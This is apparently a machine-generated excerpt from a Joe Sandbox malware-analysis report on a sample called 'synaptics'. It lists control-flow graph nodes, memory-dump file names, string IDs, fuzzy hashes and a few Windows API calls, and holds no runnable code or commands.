                                                                                                                                                                                                                                    control_flow_graph 1524 6c994750-6c994784 1525 6c99478a-6c99478f 1524->1525 1526 6c994a14-6c994a18 1524->1526 1527 6c994790-6c994799 1525->1527 1528 6c99485d-6c994881 1526->1528 1529 6c994a1e-6c994a34 1526->1529 1527->1527 1532 6c99479b-6c9947ad 1527->1532 1530 6c994909-6c99490d 1528->1530 1531 6c994887-6c99488e 1528->1531 1542 6c994a60-6c994a74 1529->1542 1543 6c994a36 1529->1543 1536 6c994913-6c994917 1530->1536 1537 6c994ac5-6c994acd 1530->1537 1533 6c9948c9-6c9948ed 1531->1533 1534 6c994890-6c994897 1531->1534 1550 6c9949cf-6c9949eb 1532->1550 1551 6c9947b3-6c9947da 1532->1551 1533->1530 1592 6c9948ef-6c994906 1533->1592 1534->1530 1540 6c994899-6c9948a0 1534->1540 1544 6c994919-6c994920 1536->1544 1545 6c994940-6c994957 1536->1545 1538 6c994bd3-6c994bdb 1537->1538 1539 6c994ad3-6c994ae2 1537->1539 1547 6c994bdd-6c994be7 1538->1547 1548 6c994bec-6c994bf1 1538->1548 1561 6c994ae8-6c994afd 1539->1561 1562 6c994b95-6c994bb6 1539->1562 1540->1530 1549 6c9948a2-6c9948a9 1540->1549 1564 6c994a9f-6c994ab2 1542->1564 1565 6c994a76-6c994a80 1542->1565 1543->1528 1552 6c994a3c-6c994a4d 1543->1552 1544->1537 1553 6c994926-6c99492d 1544->1553 1545->1537 1613 6c99495d-6c994979 1545->1613 1575 6c994ca6 1547->1575 1558 6c994bf3-6c994bff 1548->1558 1559 6c994c04-6c994c0c 1548->1559 1549->1530 1560 6c9948ab-6c9948c2 1549->1560 1594 6c9949fa-6c994a0a 1550->1594 1595 6c9949ed-6c9949f8 1550->1595 1604 6c9949ba-6c9949bd 1551->1604 1605 6c9947e0-6c9947e2 1551->1605 1578 6c994a4f-6c994a52 1552->1578 1579 6c994a85-6c994a88 1552->1579 1553->1537 1554 6c994933-6c99493a 1553->1554 1554->1537 1554->1545 1558->1575 1567 6c994c9f-6c994ca1 call 6c994470 1559->1567 1568 6c994c12-6c994c21 1559->1568 1560->1533 1636 6c9948c4-6c9948c7 1560->1636 1596 6c994aff-6c994b13 1561->1596 1597 6c994b22-6c994b35 1561->1597 1621 6c994bb8-6c994bbc 1562->1621 1622 6c994bc1-6c994bce 1562->1622 1572 6c994e13-6c994e19 1564->1572 1565->1572 1567->1575 1602 6c994c38-6c994c4e 1568->1602 1603 6c994c23-6c994c36 1568->1603 1583 6c994e1b-6c994e1e 1572->1583 1584 6c994e2c-6c994e32 1572->1584 1588 6c994ca8-6c994cb2 1575->1588 1578->1542 1591 6c994a54-6c994a5d 1578->1591 1579->1528 1581 6c994a8e-6c994a9a 1579->1581 1581->1528 1583->1584 1593 6c994e20-6c994e29 1583->1593 1599 6c994cec-6c994d0b 1588->1599 1600 6c994cb4-6c994cb8 1588->1600 1591->1542 1592->1530 1593->1584 1612 6c994a0c-6c994a0e 1594->1612 1595->1612 1596->1622 1631 6c994b19-6c994b1d 1596->1631 1634 6c994b43-6c994b45 1597->1634 1635 6c994b37-6c994b40 1597->1635 1663 6c994d0d-6c994d10 1599->1663 1664 6c994d16-6c994d1d 1599->1664 1614 6c994cba-6c994cca 1600->1614 1615 6c994ce2-6c994ce6 1600->1615 1628 6c994c50-6c994c53 1602->1628 1629 6c994c63-6c994c7a call 6c994100 1602->1629 1603->1588 1608 6c9949cb 1604->1608 1609 6c9949bf-6c9949c8 1604->1609 1605->1604 1606 6c9947e8-6c9947fc 1605->1606 1606->1604 1639 6c994802-6c994808 1606->1639 1608->1550 1609->1608 1612->1526 1612->1584 1644 6c99497f-6c99498d 1613->1644 1645 6c994ab7-6c994abc 1613->1645 1614->1615 1646 6c994ccc-6c994ccf 1614->1646 1615->1572 1615->1599 1621->1588 1622->1588 1628->1603 1640 6c994c55-6c994c61 1628->1640 1657 6c994c88-6c994c8f 1629->1657 1658 6c994c7c-6c994c85 1629->1658 1631->1588 1634->1562 1637 6c994b47-6c994b6d 1634->1637 1635->1634 1636->1530 1636->1533 1670 6c994b73-6c994b7b 1637->1670 1647 6c99480a-6c99480d 1639->1647 1648 6c994835-6c994838 1639->1648 1640->1603 1667 6c99499b-6c99499d 1644->1667 1668 6c99498f-6c994998 1644->1668 1661 6c994ac2 1645->1661 1646->1615 1650 6c994cd1-6c994cd8 1646->1650 1654 6c99481b-6c99481e 1647->1654 1655 6c99480f-6c994818 1647->1655 1659 6c99483a-6c994843 1648->1659 1660 6c994846-6c994857 1648->1660 1650->1615 1654->1526 1665 6c994824-6c994830 1654->1665 1655->1654 1657->1588 1666 6c994c91-6c994c9d 1657->1666 1658->1657 1659->1660 1660->1528 1660->1542 1661->1537 1663->1572 1663->1664 1671 6c994d1f-6c994d26 1664->1671 1672 6c994d35-6c994d51 call 6c9942b0 1664->1672 1665->1526 1666->1588 1667->1645 1669 6c9949a3-6c9949a6 1667->1669 1668->1667 1669->1537 1678 6c9949ac-6c9949b5 1669->1678 1679 6c994b89-6c994b90 1670->1679 1680 6c994b7d-6c994b86 1670->1680 1671->1672 1681 6c994d28-6c994d2f 1671->1681 1672->1572 1688 6c994d57-6c994d7e 1672->1688 1678->1661 1679->1588 1680->1679 1681->1572 1681->1672 1691 6c994d80-6c994d91 1688->1691 1692 6c994d93-6c994da3 1688->1692 1695 6c994e06-6c994e11 1691->1695 1697 6c994da5-6c994dab 1692->1697 1698 6c994de4-6c994df0 1692->1698 1695->1572 1699 6c994dad-6c994dbd 1697->1699 1700 6c994dd1-6c994de2 1697->1700 1703 6c994df3-6c994df8 1698->1703 1699->1698 1706 6c994dbf-6c994dcf 1699->1706 1700->1703 1703->1695 1705 6c994dfa-6c994e03 1703->1705 1705->1695 1706->1698 1706->1700
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C994000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C994000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c994000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: __main__
                                                                                                                                                                                                                                    • API String ID: 0-3994138233
                                                                                                                                                                                                                                    • Opcode ID: 1559a680e0bdb0ae7be0c1cb9617dc843be76019644b1e07f8b846ac86ea14dd
                                                                                                                                                                                                                                    • Instruction ID: 632e4407e9629422e09461101b981ae8e9c591a773283355f469d9cbf885adf2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1559a680e0bdb0ae7be0c1cb9617dc843be76019644b1e07f8b846ac86ea14dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6712E3B4A443019BE701CB75C840B9BB3E8AF4532CF1C4628E87997B90E775E949CF92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1836 6ca9a350-6ca9a36b 1837 6ca9a36d 1836->1837 1838 6ca9a36f-6ca9a3b5 1836->1838 1837->1838 1839 6ca9a6b8-6ca9a6c8 1838->1839 1840 6ca9a3bb 1838->1840 1841 6ca9a6cc-6ca9a6ea 1839->1841 1842 6ca9a3c0-6ca9a3f1 1840->1842 1845 6ca9a44c-6ca9a44e 1842->1845 1846 6ca9a3f3-6ca9a3f9 1842->1846 1849 6ca9a461-6ca9a467 1845->1849 1850 6ca9a450-6ca9a453 1845->1850 1847 6ca9a3fb-6ca9a3ff 1846->1847 1848 6ca9a405-6ca9a411 1846->1848 1847->1848 1851 6ca9a589-6ca9a5a7 1847->1851 1852 6ca9a4c7-6ca9a4c9 1848->1852 1853 6ca9a417-6ca9a43c call 6cad5000 1848->1853 1855 6ca9a469-6ca9a46c 1849->1855 1856 6ca9a47a-6ca9a480 1849->1856 1850->1849 1854 6ca9a455-6ca9a45e 1850->1854 1851->1845 1877 6ca9a5ad-6ca9a5b0 1851->1877 1859 6ca9a4cb-6ca9a4cd 1852->1859 1860 6ca9a515-6ca9a51d 1852->1860 1863 6ca9a441-6ca9a446 1853->1863 1854->1849 1855->1856 1861 6ca9a46e-6ca9a477 1855->1861 1857 6ca9a49a-6ca9a4b3 1856->1857 1858 6ca9a482-6ca9a488 1856->1858 1864 6ca9a4be-6ca9a4c6 1857->1864 1865 6ca9a4b5 1857->1865 1858->1857 1862 6ca9a48a-6ca9a497 1858->1862 1870 6ca9a4cf-6ca9a4db 1859->1870 1871 6ca9a4e0-6ca9a4f4 1859->1871 1866 6ca9a51f-6ca9a522 1860->1866 1867 6ca9a532-6ca9a537 1860->1867 1861->1856 1862->1857 1863->1845 1872 6ca9a571 1863->1872 1865->1864 1873 6ca9a53d-6ca9a541 1866->1873 1874 6ca9a524-6ca9a530 1866->1874 1875 6ca9a539 1867->1875 1876 6ca9a543-6ca9a554 1867->1876 1878 6ca9a575-6ca9a57a 1870->1878 1889 6ca9a507-6ca9a50d 1871->1889 1890 6ca9a4f6-6ca9a4f9 1871->1890 1872->1878 1873->1878 1899 6ca9a56d 1874->1899 1875->1873 1891 6ca9a562-6ca9a567 1876->1891 1892 6ca9a556-6ca9a55f 1876->1892 1877->1845 1883 6ca9a5b6-6ca9a5c2 1877->1883 1881 6ca9a57c-6ca9a584 1878->1881 1882 6ca9a5c7-6ca9a5c9 1878->1882 1881->1842 1885 6ca9a5cf-6ca9a5df 1882->1885 1886 6ca9a6a7-6ca9a6af 1882->1886 1883->1845 1894 6ca9a67b-6ca9a6a2 1885->1894 1895 6ca9a5e5-6ca9a5e7 1885->1895 1896 6ca9a6eb-6ca9a6f0 1886->1896 1897 6ca9a6b1-6ca9a6b6 1886->1897 1889->1849 1898 6ca9a513 1889->1898 1890->1889 1893 6ca9a4fb-6ca9a504 1890->1893 1891->1845 1891->1899 1892->1891 1893->1889 1894->1845 1895->1894 1901 6ca9a5ed-6ca9a5fc 1895->1901 1902 6ca9a7f2 1896->1902 1903 6ca9a6f6-6ca9a710 1896->1903 1897->1839 1897->1841 1898->1899 1899->1872 1901->1845 1916 6ca9a602-6ca9a60d 1901->1916 1904 6ca9a7f6-6ca9a7f8 1902->1904 1917 6ca9a8c8-6ca9a8ce 1903->1917 1918 6ca9a716-6ca9a720 1903->1918 1908 6ca9a7fa 1904->1908 1909 6ca9a806-6ca9a815 1904->1909 1912 6ca9a81d 1908->1912 1913 6ca9a7fc-6ca9a804 1908->1913 1914 6ca9a81b-6ca9a88f 1909->1914 1915 6ca9a963-6ca9a972 1909->1915 1921 6ca9a820-6ca9a82e 1912->1921 1913->1909 1913->1921 1944 6ca9a892 1914->1944 1923 6ca9a61b-6ca9a64a 1916->1923 1924 6ca9a60f-6ca9a618 1916->1924 1919 6ca9a8e1-6ca9a8e7 1917->1919 1920 6ca9a8d0-6ca9a8d3 1917->1920 1925 6ca9a7bf-6ca9a7cf 1918->1925 1926 6ca9a726-6ca9a73a 1918->1926 1929 6ca9a8e9-6ca9a8ef 1919->1929 1930 6ca9a901-6ca9a909 1919->1930 1920->1919 1928 6ca9a8d5-6ca9a8de 1920->1928 1931 6ca9a830-6ca9a835 1921->1931 1932 6ca9a837-6ca9a84e 1921->1932 1923->1864 1946 6ca9a650-6ca9a67a 1923->1946 1924->1923 1925->1904 1933 6ca9a73c-6ca9a742 1926->1933 1934 6ca9a796-6ca9a79c 1926->1934 1928->1919 1929->1930 1937 6ca9a8f1-6ca9a8fe 1929->1937 1931->1944 1952 6ca9a850-6ca9a855 1932->1952 1953 6ca9a857-6ca9a871 1932->1953 1941 6ca9a751-6ca9a767 1933->1941 1942 6ca9a744-6ca9a74c 1933->1942 1935 6ca9a79e-6ca9a7b1 1934->1935 1936 6ca9a7d5-6ca9a7ed 1934->1936 1956 6ca9a7d1 1935->1956 1957 6ca9a7b3-6ca9a7b7 1935->1957 1936->1917 1937->1930 1941->1917 1955 6ca9a76d-6ca9a775 1941->1955 1942->1917 1951 6ca9a894-6ca9a89a 1944->1951 1958 6ca9a89c-6ca9a8a2 1951->1958 1959 6ca9a8b4-6ca9a8c6 1951->1959 1952->1944 1953->1951 1967 6ca9a873-6ca9a882 1953->1967 1962 6ca9a7bb 1955->1962 1963 6ca9a777 1955->1963 1956->1936 1957->1962 1958->1959 1965 6ca9a8a4-6ca9a8b1 1958->1965 1959->1917 1960 6ca9a90a-6ca9a939 1959->1960 1960->1864 1972 6ca9a93f-6ca9a962 1960->1972 1962->1925 1966 6ca9a780-6ca9a792 1963->1966 1965->1959 1966->1966 1968 6ca9a794 1966->1968 1967->1967 1969 6ca9a884 1967->1969 1968->1962 1969->1951
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA9A000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA9A000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca9a000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 97b99afcedd067bf66dc773be1025b7dbb24d2d13a190d405ae536a0afc07bd3
                                                                                                                                                                                                                                    • Instruction ID: 26ebcf2cf0af8ac7892e63cf4f01f9e9a90db54a860c7a42d610d029672afd86
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97b99afcedd067bf66dc773be1025b7dbb24d2d13a190d405ae536a0afc07bd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13127D71A183018FC714CF18D845A5ABBF5FF85328F144A6EE965877A0D731EC86CB92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1974 6c9d8390-6c9d83a4 1975 6c9d83a6-6c9d83be 1974->1975 1976 6c9d83f0-6c9d83f4 1974->1976 1979 6c9d83c0-6c9d83d4 1975->1979 1977 6c9d83f6-6c9d8410 1976->1977 1978 6c9d8412-6c9d841f call 6c9d89f0 1976->1978 1977->1979 1983 6c9d83e7 1978->1983 1984 6c9d8421-6c9d842f 1978->1984 1979->1983 1988 6c9d83d6-6c9d83d9 1979->1988 1985 6c9d83e9-6c9d83ef 1983->1985 1989 6c9d843d-6c9d843f 1984->1989 1990 6c9d8431-6c9d843a 1984->1990 1988->1983 1991 6c9d83db-6c9d83e4 1988->1991 1989->1983 1992 6c9d8441 1989->1992 1990->1989 1991->1983 1993 6c9d8455-6c9d8461 1992->1993 1994 6c9d8443-6c9d8454 1992->1994 1997 6c9d8498-6c9d84a8 1993->1997 1998 6c9d8463-6c9d8478 1993->1998 2001 6c9d84aa-6c9d84c1 1997->2001 2002 6c9d84c3-6c9d84c6 1997->2002 2003 6c9d848a-6c9d848f 1998->2003 2004 6c9d847a-6c9d847d 1998->2004 2006 6c9d84d4-6c9d84ea 2001->2006 2005 6c9d84c8-6c9d84d1 2002->2005 2002->2006 2009 6c9d8495 2003->2009 2004->1997 2007 6c9d847f-6c9d8488 2004->2007 2005->2006 2006->1985 2013 6c9d84f0-6c9d850d 2006->2013 2007->2009 2009->1997 2014 6c9d8766-6c9d8772 2013->2014 2015 6c9d8513-6c9d851a 2013->2015 2017 6c9d8778 2014->2017 2015->2014 2016 6c9d8520-6c9d8525 2015->2016 2018 6c9d852b-6c9d855b 2016->2018 2019 6c9d8755-6c9d8764 2016->2019 2020 6c9d877b-6c9d8783 2017->2020 2021 6c9d8560-6c9d8562 2018->2021 2019->2017 2020->1985 2023 6c9d8789-6c9d8792 2020->2023 2024 6c9d856f-6c9d8576 2021->2024 2025 6c9d8564-6c9d856a 2021->2025 2023->1985 2026 6c9d8798-6c9d87ae 2023->2026 2027 6c9d857c-6c9d8583 2024->2027 2028 6c9d86ea-6c9d86ef 2024->2028 2025->2024 2027->2028 2029 6c9d8589-6c9d8597 2027->2029 2030 6c9d86f1-6c9d8702 2028->2030 2031 6c9d8710-6c9d8713 2028->2031 2033 6c9d8599-6c9d85ac 2029->2033 2034 6c9d85b4-6c9d85c3 2029->2034 2030->2031 2042 6c9d8704-6c9d870d 2030->2042 2035 6c9d8715-6c9d871e 2031->2035 2036 6c9d8721-6c9d8753 2031->2036 2043 6c9d85ae 2033->2043 2044 6c9d85c9-6c9d85cc 2033->2044 2034->2044 2045 6c9d86cf-6c9d86d2 2034->2045 2035->2036 2036->2020 2042->2031 2043->2034 2049 6c9d8690-6c9d8696 2043->2049 2050 6c9d85ce-6c9d85d7 2044->2050 2051 6c9d85da-6c9d85dd 2044->2051 2046 6c9d86e4 2045->2046 2047 6c9d86d4-6c9d86e1 2045->2047 2053 6c9d86e6 2046->2053 2047->2046 2049->2053 2054 6c9d8698-6c9d869d 2049->2054 2050->2051 2055 6c9d85df-6c9d85e8 2051->2055 2056 6c9d85eb-6c9d85f7 2051->2056 2053->2028 2061 6c9d86af-6c9d86b1 2054->2061 2062 6c9d869f-6c9d86ac 2054->2062 2055->2056 2058 6c9d85f9-6c9d8621 2056->2058 2059 6c9d8634-6c9d865c 2056->2059 2058->2059 2078 6c9d8623-6c9d8626 2058->2078 2065 6c9d867f-6c9d8684 2059->2065 2066 6c9d865e-6c9d8660 2059->2066 2061->2053 2062->2061 2067 6c9d8686-6c9d8688 2065->2067 2068 6c9d86b3-6c9d86c4 2065->2068 2071 6c9d866a-6c9d866d 2066->2071 2072 6c9d8662-6c9d8668 2066->2072 2067->2021 2074 6c9d868e 2067->2074 2079 6c9d87be-6c9d87e1 2068->2079 2080 6c9d86ca-6c9d87b4 2068->2080 2071->2065 2073 6c9d866f-6c9d867c 2071->2073 2072->2065 2073->2065 2074->2028 2078->2059 2082 6c9d8628-6c9d8631 2078->2082 2084 6c9d882f-6c9d8833 2079->2084 2085 6c9d87e3-6c9d87fd 2079->2085 2080->2079 2082->2059 2087 6c9d8835-6c9d8851 2084->2087 2088 6c9d8853-6c9d885e 2084->2088 2089 6c9d87ff-6c9d8813 2085->2089 2087->2089 2090 6c9d88cd-6c9d88ef 2088->2090 2091 6c9d8860-6c9d8865 call 6c9d6b10 2088->2091 2095 6c9d8826-6c9d882e 2089->2095 2102 6c9d8815-6c9d8818 2089->2102 2090->2095 2097 6c9d88f5-6c9d88ff 2090->2097 2093 6c9d886a-6c9d886e 2091->2093 2093->2095 2096 6c9d8870-6c9d8874 2093->2096 2099 6c9d8884-6c9d8888 2096->2099 2100 6c9d8876-6c9d8882 2096->2100 2097->2096 2101 6c9d8905-6c9d891e 2097->2101 2103 6c9d888e-6c9d8891 2099->2103 2104 6c9d8939-6c9d8941 2099->2104 2100->2095 2100->2099 2101->2095 2113 6c9d8924-6c9d8938 2101->2113 2102->2095 2105 6c9d881a-6c9d8823 2102->2105 2108 6c9d889f-6c9d88a4 2103->2108 2109 6c9d8893-6c9d889c 2103->2109 2105->2095 2111 6c9d88be-6c9d88cc 2108->2111 2112 6c9d88a6-6c9d88b0 2108->2112 2109->2108 2112->2111 2115 6c9d88b2-6c9d88bb 2112->2115 2115->2111
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9D8000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9D8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9d8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                    • Opcode ID: 864bf5c47966507f24530bb70add811dade12b05f5cc915339cf7e9d51d73808
                                                                                                                                                                                                                                    • Instruction ID: 2be82d3851f729a10086e22c9b45a54c073c775470b7fb2e757ba43a19f366f2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 864bf5c47966507f24530bb70add811dade12b05f5cc915339cf7e9d51d73808
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00020471604A019BD704CF68DC40B5673F8EF85338F15966AE928A7B92D730F846CBD6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: 4
                                                                                                                                                                                                                                    • API String ID: 0-211377460
                                                                                                                                                                                                                                    • Opcode ID: ae36ce2a8a8733e4b66023665fa9b6d765c921751a01ef25ac0cfd317ff33efa
                                                                                                                                                                                                                                    • Instruction ID: 4379f0736ebe03bd4dc24eeba1f3e3a13edc7ba4fd6d6eeccd65b0d120d1dbb2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae36ce2a8a8733e4b66023665fa9b6d765c921751a01ef25ac0cfd317ff33efa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE1A3B06053018FE704CF69D990A5BB7F5EF85318F14852DF9658BB50E731E88ACB92

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 2119 6cae5130-6cae5180 2120 6cae518f-6cae5195 2119->2120 2121 6cae5182-6cae518b 2119->2121 2122 6cae51a6-6cae51ad 2120->2122 2123 6cae5197-6cae51a1 2120->2123 2121->2120 2125 6cae560b-6cae5610 2122->2125 2126 6cae51b3-6cae51b7 2122->2126 2124 6cae5615-6cae563e 2123->2124 2142 6cae5640-6cae5643 2124->2142 2143 6cae5651 2124->2143 2125->2124 2127 6cae51b9-6cae51c3 call 6caef820 2126->2127 2128 6cae51c6-6cae51ce 2126->2128 2127->2128 2130 6cae51d0-6cae51d4 2128->2130 2133 6cae51d6-6cae51d8 2130->2133 2134 6cae51f0-6cae51f2 2130->2134 2135 6cae51ec-6cae51ee 2133->2135 2136 6cae51da-6cae51e0 2133->2136 2137 6cae51f5-6cae51f7 2134->2137 2135->2137 2136->2134 2139 6cae51e2-6cae51ea 2136->2139 2140 6cae51f9-6cae51ff 2137->2140 2141 6cae5204-6cae520b 2137->2141 2139->2130 2139->2135 2144 6cae52d4-6cae52ee 2140->2144 2146 6cae5210-6cae5214 2141->2146 2142->2143 2145 6cae5645-6cae5649 2142->2145 2147 6cae5653-6cae565a 2143->2147 2144->2143 2161 6cae52f4-6cae52fa 2144->2161 2154 6cae564e 2145->2154 2150 6cae5216-6cae5218 2146->2150 2151 6cae5230-6cae5232 2146->2151 2148 6cae565c-6cae5665 2147->2148 2149 6cae5668-6cae567b 2147->2149 2148->2149 2155 6cae522c-6cae522e 2150->2155 2156 6cae521a-6cae5220 2150->2156 2152 6cae5235-6cae5237 2151->2152 2157 6cae5239-6cae5240 2152->2157 2158 6cae5245-6cae524c 2152->2158 2154->2143 2155->2152 2156->2151 2162 6cae5222-6cae522a 2156->2162 2157->2144 2163 6cae5250-6cae5254 2158->2163 2161->2143 2164 6cae5300-6cae5317 2161->2164 2162->2146 2162->2155 2165 6cae5256-6cae5258 2163->2165 2166 6cae5270-6cae5272 2163->2166 2164->2143 2174 6cae531d-6cae531f 2164->2174 2167 6cae526c-6cae526e 2165->2167 2168 6cae525a-6cae5260 2165->2168 2169 6cae5275-6cae5277 2166->2169 2167->2169 2168->2166 2171 6cae5262-6cae526a 2168->2171 2172 6cae5279-6cae5280 2169->2172 2173 6cae5282 2169->2173 2171->2163 2171->2167 2172->2144 2177 6cae5287-6cae528b 2173->2177 2175 6cae5586-6cae55a5 2174->2175 2176 6cae5325-6cae532c 2174->2176 2175->2143 2190 6cae55ab-6cae55b9 2175->2190 2178 6cae532e-6cae5330 2176->2178 2179 6cae5335-6cae5340 2176->2179 2180 6cae528d-6cae528f 2177->2180 2181 6cae52a7-6cae52a9 2177->2181 2178->2147 2179->2143 2191 6cae5346-6cae5378 2179->2191 2182 6cae52a3-6cae52a5 2180->2182 2183 6cae5291-6cae5297 2180->2183 2184 6cae52ac-6cae52b4 2181->2184 2182->2184 2183->2181 2186 6cae5299-6cae52a1 2183->2186 2187 6cae52ba-6cae52bc 2184->2187 2188 6cae55e3-6cae5609 2184->2188 2186->2177 2186->2182 2192 6cae52be-6cae52c6 2187->2192 2193 6cae52cb-6cae52d0 2187->2193 2188->2143 2195 6cae55bf-6cae55ca 2190->2195 2198 6cae537e-6cae5395 2191->2198 2199 6cae54f7-6cae5500 2191->2199 2192->2124 2193->2144 2195->2147 2197 6cae55d0-6cae55d3 2195->2197 2197->2147 2200 6cae55d5-6cae55e1 2197->2200 2198->2199 2204 6cae539b-6cae539d 2198->2204 2199->2154 2200->2147 2204->2199 2205 6cae53a3-6cae53d8 2204->2205 2205->2199 2207 6cae53de-6cae53e0 2205->2207 2208 6cae53e2-6cae540e 2207->2208 2209 6cae5413-6cae5432 2207->2209 2208->2154 2209->2199 2212 6cae5438-6cae543c 2209->2212 2212->2199 2214 6cae5442-6cae5455 2212->2214 2214->2199 2215 6cae545b-6cae5464 2214->2215 2217 6cae5469-6cae5472 2215->2217 2218 6cae5466 2215->2218 2219 6cae5477-6cae5485 2217->2219 2220 6cae5474 2217->2220 2218->2217 2221 6cae5487 2219->2221 2222 6cae54b1-6cae54e4 2219->2222 2220->2219 2223 6cae548e-6cae549a 2221->2223 2224 6cae549c-6cae54aa 2221->2224 2225 6cae5505-6cae551a 2221->2225 2222->2199 2234 6cae54e6-6cae54e9 2222->2234 2230 6cae54ad-6cae54af 2223->2230 2224->2230 2225->2199 2231 6cae551c-6cae552d 2225->2231 2230->2222 2233 6cae552f 2230->2233 2231->2233 2233->2199 2236 6cae5531-6cae5537 2233->2236 2234->2199 2237 6cae54eb-6cae54f4 2234->2237 2238 6cae555c-6cae5581 2236->2238 2239 6cae5539-6cae5557 2236->2239 2237->2199 2238->2147 2239->2154
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: impossible module node
                                                                                                                                                                                                                                    • API String ID: 0-4034633576
                                                                                                                                                                                                                                    • Opcode ID: 0e227f87412de24da4e8814ac52532ded47e30c85e18c5e5afe16ed3c38f1bcf
                                                                                                                                                                                                                                    • Instruction ID: 02966307b35285b01b6ec31fb926d0dbf457e6873f0a16584dfcd5f4ef38cae9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e227f87412de24da4e8814ac52532ded47e30c85e18c5e5afe16ed3c38f1bcf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE146B1B082419BD700CF68E841B9B77F1AF4931CF0C4528E9948BB91E731E989DBD2
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?), ref: 6C9C24E2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C2000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c2000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InformationTimeZone
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 565725191-0
                                                                                                                                                                                                                                    • Opcode ID: 2b9c331feae2fab3269879f91b08f8e93687834cfbd945868ce4c6c817743646
                                                                                                                                                                                                                                    • Instruction ID: 0eddc3a9893407b12740941e98cee906f3b753fb80332e128e9bdc9a9f36b664
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b9c331feae2fab3269879f91b08f8e93687834cfbd945868ce4c6c817743646
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C3115B1E015119BC7109AA8DC08AEB3BB89F05334F140724EA69D7BD1EB38ED4987C3
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FormatMessageW.KERNELBASE(00001300,00000000,?,00000400,?,00000000,00000000,?,?,?,?,?,6CB06564,?,?,?), ref: 6CB065AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB02000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB02000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb02000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FormatMessage
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1306739567-0
